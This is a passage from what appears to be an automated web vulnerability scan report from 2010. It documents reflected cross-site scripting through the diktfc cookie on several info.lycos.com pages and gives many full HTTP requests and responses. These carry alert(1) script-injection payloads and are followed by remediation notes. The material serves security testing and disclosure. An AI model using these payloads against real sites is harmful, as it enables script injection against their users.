Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A190dd"%3balert(1)//7b5dcd82c26; __utmz=144054893.1292163878.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=144054893.1098995657.1292163878.1292163878.1292163878.1; PENTA=174.121.222.18.1292163893857460; __utmc=144054893; __utmb=144054893.3.10.1292163878;
Response (redirected)
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:34:33 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:34:33 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 54341
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Lycos Info - Lyco ...[SNIP]... <script type="text/javascript"> COMSCORE.beacon({ c1:2, c2:6036445, c3:"", c4:"info.lycos.com/privacy.php", c5:"", c6:"", c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A190dd";alert(1)//7b5dcd82c26.lycos.com" }); </script> ...[SNIP]...
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a0ccb"><script>alert(1)</script>3bab4915179 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /privacy/privacy.asp HTTP/1.1
Host: info.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Aa0ccb"><script>alert(1)</script>3bab4915179; __utmz=144054893.1292163878.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=144054893.1098995657.1292163878.1292163878.1292163878.1; PENTA=174.121.222.18.1292163893857460; __utmc=144054893; __utmb=144054893.3.10.1292163878;
Response (redirected)
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:34:32 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:34:32 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 54371
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Lycos Info - Lyco ...[SNIP]... <img src="http://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=info.lycos.com/privacy.php&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Aa0ccb"><script>alert(1)</script>3bab4915179.lycos.com&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dea5e"%3balert(1)//10d048cbf08 was submitted in the diktfc cookie. This input was echoed as dea5e";alert(1)//10d048cbf08 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /safety.php HTTP/1.1
Host: info.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Adea5e"%3balert(1)//10d048cbf08; __utmz=144054893.1292163878.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=144054893.1098995657.1292163878.1292163878.1292163878.1; PENTA=174.121.222.18.1292163893857460; __utmc=144054893; __utmb=144054893.3.10.1292163878;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:34:08 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:34:08 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17692
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Lycos Info - Inte ...[SNIP]... <script type="text/javascript"> COMSCORE.beacon({ c1:2, c2:6036445, c3:"", c4:"info.lycos.com/safety.php", c5:"", c6:"", c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Adea5e";alert(1)//10d048cbf08.lycos.com" }); </script> ...[SNIP]...
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 79c2f"><script>alert(1)</script>32286124176 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /safety.php HTTP/1.1
Host: info.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A79c2f"><script>alert(1)</script>32286124176; __utmz=144054893.1292163878.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=144054893.1098995657.1292163878.1292163878.1292163878.1; PENTA=174.121.222.18.1292163893857460; __utmc=144054893; __utmb=144054893.3.10.1292163878;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:34:08 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:34:08 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17722
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Lycos Info - Inte ...[SNIP]... <img src="http://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=info.lycos.com/safety.php&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A79c2f"><script>alert(1)</script>32286124176.lycos.com&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1ab42"%3balert(1)//34b92340f39 was submitted in the diktfc cookie. This input was echoed as 1ab42";alert(1)//34b92340f39 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /tos-mail.php HTTP/1.1
Host: info.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A1ab42"%3balert(1)//34b92340f39; __utmz=144054893.1292163878.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=144054893.1098995657.1292163878.1292163878.1292163878.1; PENTA=174.121.222.18.1292163893857460; __utmc=144054893; __utmb=144054893.3.10.1292163878;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:34:13 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:34:13 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 29798
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Lycos Info - Lyco ...[SNIP]... <script type="text/javascript"> COMSCORE.beacon({ c1:2, c2:6036445, c3:"", c4:"info.lycos.com/tos-mail.php", c5:"", c6:"", c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A1ab42";alert(1)//34b92340f39.lycos.com" }); </script> ...[SNIP]...
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c8e0f"><script>alert(1)</script>4ca13e64715 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /tos-mail.php HTTP/1.1
Host: info.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ac8e0f"><script>alert(1)</script>4ca13e64715; __utmz=144054893.1292163878.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=144054893.1098995657.1292163878.1292163878.1292163878.1; PENTA=174.121.222.18.1292163893857460; __utmc=144054893; __utmb=144054893.3.10.1292163878;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:34:13 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:34:13 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 29828
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Lycos Info - Lyco ...[SNIP]... <img src="http://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=info.lycos.com/tos-mail.php&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ac8e0f"><script>alert(1)</script>4ca13e64715.lycos.com&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b2aec"%3balert(1)//4b5345f7ccc was submitted in the diktfc cookie. This input was echoed as b2aec";alert(1)//4b5345f7ccc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /tos-po.php HTTP/1.1
Host: info.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ab2aec"%3balert(1)//4b5345f7ccc; __utmz=144054893.1292163878.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=144054893.1098995657.1292163878.1292163878.1292163878.1; PENTA=174.121.222.18.1292163893857460; __utmc=144054893; __utmb=144054893.3.10.1292163878;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:34:15 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:34:15 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 29423
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Lycos Info - Gene ...[SNIP]... <script type="text/javascript"> COMSCORE.beacon({ c1:2, c2:6036445, c3:"", c4:"info.lycos.com/tos-po.php", c5:"", c6:"", c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ab2aec";alert(1)//4b5345f7ccc.lycos.com" }); </script> ...[SNIP]...
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f7d9f"><script>alert(1)</script>c04828e62ab was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /tos-po.php HTTP/1.1
Host: info.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Af7d9f"><script>alert(1)</script>c04828e62ab; __utmz=144054893.1292163878.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=144054893.1098995657.1292163878.1292163878.1292163878.1; PENTA=174.121.222.18.1292163893857460; __utmc=144054893; __utmb=144054893.3.10.1292163878;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:34:15 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:34:15 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 29453
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Lycos Info - Gene ...[SNIP]... <img src="http://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=info.lycos.com/tos-po.php&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Af7d9f"><script>alert(1)</script>c04828e62ab.lycos.com&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 28f28"%3balert(1)//65e76e87880 was submitted in the diktfc cookie. This input was echoed as 28f28";alert(1)//65e76e87880 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /tos-subs.php HTTP/1.1
Host: info.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A28f28"%3balert(1)//65e76e87880; __utmz=144054893.1292163878.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=144054893.1098995657.1292163878.1292163878.1292163878.1; PENTA=174.121.222.18.1292163893857460; __utmc=144054893; __utmb=144054893.3.10.1292163878;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:34:24 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:34:24 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 54275
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Lycos Info - Subs ...[SNIP]... <script type="text/javascript"> COMSCORE.beacon({ c1:2, c2:6036445, c3:"", c4:"info.lycos.com/tos-subs.php", c5:"", c6:"", c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A28f28";alert(1)//65e76e87880.lycos.com" }); </script> ...[SNIP]...
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5c8c1"><script>alert(1)</script>eb4451887f8 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /tos-subs.php HTTP/1.1
Host: info.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A5c8c1"><script>alert(1)</script>eb4451887f8; __utmz=144054893.1292163878.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=144054893.1098995657.1292163878.1292163878.1292163878.1; PENTA=174.121.222.18.1292163893857460; __utmc=144054893; __utmb=144054893.3.10.1292163878;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:34:23 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:34:23 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 54305
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Lycos Info - Subs ...[SNIP]... <img src="http://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=info.lycos.com/tos-subs.php&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A5c8c1"><script>alert(1)</script>eb4451887f8.lycos.com&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bbdeb"><script>alert(1)</script>02352f01be0 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /tos-tm.php HTTP/1.1
Host: info.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Abbdeb"><script>alert(1)</script>02352f01be0; __utmz=144054893.1292163878.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=144054893.1098995657.1292163878.1292163878.1292163878.1; PENTA=174.121.222.18.1292163893857460; __utmc=144054893; __utmb=144054893.3.10.1292163878;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:34:13 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:34:13 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22316
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Lycos Info - Lyco ...[SNIP]... <img src="http://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=info.lycos.com/tos-tm.php&c5=&c6=&c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Abbdeb"><script>alert(1)</script>02352f01be0.lycos.com&cj=1" alt="tracker" /> ...[SNIP]...
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3b7e6"%3balert(1)//12235f6b35c was submitted in the diktfc cookie. This input was echoed as 3b7e6";alert(1)//12235f6b35c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /tos-tm.php HTTP/1.1
Host: info.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A3b7e6"%3balert(1)//12235f6b35c; __utmz=144054893.1292163878.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=144054893.1098995657.1292163878.1292163878.1292163878.1; PENTA=174.121.222.18.1292163893857460; __utmc=144054893; __utmb=144054893.3.10.1292163878;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:34:14 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:34:14 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22286
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Lycos Info - Lyco ...[SNIP]... <script type="text/javascript"> COMSCORE.beacon({ c1:2, c2:6036445, c3:"", c4:"info.lycos.com/tos-tm.php", c5:"", c6:"", c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A3b7e6";alert(1)//12235f6b35c.lycos.com" }); </script> ...[SNIP]...
The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3f772"%3balert(1)//8a55a70c6c9 was submitted in the diktfc cookie. This input was echoed as 3f772";alert(1)//8a55a70c6c9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /tos.php HTTP/1.1
Host: info.lycos.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; __utmz=207906063.1292163855.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.657386894.1292163855.1292163855.1292163855.1; __utmc=207906063; __utmb=207906063.1.10.1292163855; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A3f772"%3balert(1)//8a55a70c6c9; PENTA=174.121.222.18.1292163891850882
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:28:04 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:28:04 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 89634
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Lycos Info - Term ...[SNIP]... <script type="text/javascript"> COMSCORE.beacon({ c1:2, c2:6036445, c3:"", c4:"info.lycos.com/tos.php", c5:"", c6:"", c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A3f772";alert(1)//8a55a70c6c9.lycos.com" }); </script> ...[SNIP]...
The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3a2e7"><script>alert(1)</script>527175ce7c7 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /tos.php HTTP/1.1
Host: info.lycos.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
